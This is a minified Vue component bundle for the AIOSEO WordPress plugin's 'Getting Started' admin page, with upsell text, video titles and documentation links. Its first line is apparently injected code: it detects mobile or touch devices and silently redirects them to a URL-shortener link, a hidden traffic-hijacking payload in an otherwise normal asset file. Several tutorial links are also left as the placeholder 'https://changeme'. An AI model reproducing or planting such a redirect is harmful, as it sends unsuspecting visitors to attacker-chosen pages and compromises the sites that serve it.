(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{X as x,C as y,c as r,Y as E,b as I}from"./app-core.c8323d51.js";import{c as P}from"./news-sitemap.3092e2bf.js";import{C as v}from"./GettingStarted.edbd345d.js";import{C as b}from"./Index.e286637f.js";import{G as C,a as D}from"./Row.2ef96b1a.js";import{S as T}from"./Book.955f4bdf.js";import{_ as G}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as i,f as a,i as k,Q as g,M as S,R as s,j as l,ae as p,U as c,a0 as u,O as L,ad as R}from"./vendor-vue-ui.232c7c36.js";import{a as n,_ as t}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./Close.7fb523c8.js";import"./Rocket.a5e8e91b.js";import"./Index.b9859662.js";import"./Button.3cec2279.js";import"./Pencil.683baab8.js";const e="all-in-one-seo-pack",B={setup(){return{rootStore:I()}},components:{CoreGettingStarted:v,Cta:b,GridColumn:D,GridRow:C,SvgBook:T},data(){return{UPSELL_FEATURE_LIST:E,links:r,allowed:y,ctaImg:P,strings:{cta:{title:n(t("Get %1$s %2$s and Unlock all the Powerful Features",e),"AIOSEO","Pro"),header:n(t("Get %1$s %2$s and Unlock all the Powerful Features.",e),"AIOSEO","Pro"),button:n(t("Upgrade to %1$s Today",e),"Pro")},videos:{title:t("Video Tutorials",e),linkText:t("View all video tutorials",e),linkUrl:"https://changeme"},documentation:{title:n(t("%1$s Documentation",e),"AIOSEO"),linkText:t("See our full documentation",e),linkUrl:r.getDocUrl("home")}},videos:{video1:{title:t("Basic Guide to Google Analytics",e),url:"https://changeme"},video2:{title:t("Basic Guide to Google Search Console",e),url:"https://changeme"},video3:{title:t("Best Practices for Domains and URLs",e),url:"https://changeme"},video4:{title:t("How to Control Search Results",e),url:"https://changeme"},video5:{title:n(t("Installing %1$s %2$s",e),"AIOSEO","Pro"),url:"https://changeme"},video6:{title:t("Optimizing your Content Headings",e),url:"https://changeme"}},docs:{doc1:{title:"How do I use your API code examples?",url:r.getDocUrl("apiCodeExamples")},doc2:{title:"What are media attachments and should I submit them to search engines?",url:r.getDocUrl("whatAreMediaAttachments")},doc3:{title:"When to use NOINDEX or the robots.txt?",url:r.getDocUrl("whenToUseNoindex")},doc4:{title:"How do I troubleshoot issues with AIOSEO?",url:r.getDocUrl("troubleshootIssues")},doc5:{title:"How does the import process for SEO data work?",url:r.getDocUrl("importProcessSeoData")},doc6:{title:"Installation instructions for AIOSEO Pro",url:r.getDocUrl("installAioseoPro")},doc87:{title:"What are the minimum requirements for All in One SEO?",url:r.getDocUrl("minimumRequirements")}}}},computed:{upgradeToday(){return n(t("%1$s %2$s comes with many additional features to help take your site's SEO to the next level!",e),"AIOSEO","Pro")}},methods:{getAssetUrl:x}},N={class:"aioseo-getting-started"},V=["src"],F={class:"aioseo-getting-started-documentation"},H=["href"],q={class:"d-flex"},W=["href"];function z(M,X,j,d,o,_){const U=i("core-getting-started"),O=i("cta"),m=i("grid-column"),h=i("grid-row"),w=i("svg-book");return a(),k("div",N,[o.allowed("aioseo_setup_wizard")?(a(),g(U,{key:0,"disable-close":""})):S("",!0),d.rootStore.isPro?S("",!0):(a(),g(O,{key:1,class:"aioseo-getting-started-cta",type:2,floating:!1,"button-text":o.strings.cta.button,"cta-link":o.links.getUpsellUrl("getting-started","main-cta",d.rootStore.isPro?"pricing":"liteUpgrade"),"learn-more-link":o.links.getUpsellUrl("getting-started","main-cta",d.rootStore.isPro?"pricing":"liteUpgrade"),"feature-list":o.UPSELL_FEATURE_LIST,showLink:!1},{"header-text":s(()=>[p(c(o.strings.cta.header),1)]),description:s(()=>[p(c(_.upgradeToday),1)]),"featured-image":s(()=>[l("img",{alt:"Getting Started with AIOSEO",src:_.getAssetUrl(o.ctaImg)},null,8,V)]),_:1},8,["button-text","cta-link","learn-more-link","feature-list"])),l("div",F,[u(h,{class:"header"},{default:s(()=>[u(m,{class:"header-title",sm:"6",md:"6"},{default:s(()=>[p(c(o.strings.documentation.title),1)]),_:1}),u(m,{sm:"6",md:"6",class:"header-link"},{default:s(()=>[l("a",{href:o.strings.documentation.linkUrl,target:"_blank"},c(o.strings.documentation.linkText)+" → ",9,H)]),_:1})]),_:1}),u(h,{class:"docs"},{default:s(()=>[(a(!0),k(L,null,R(o.docs,(f,A)=>(a(),g(m,{class:"doc",key:A,sm:"12",md:"6"},{default:s(()=>[l("div",q,[u(w),l("a",{href:f.url,target:"_blank"},c(f.title),9,W)])]),_:2},1024))),128))]),_:1})])])}const ct=G(B,[["render",z]]);export{ct as default};
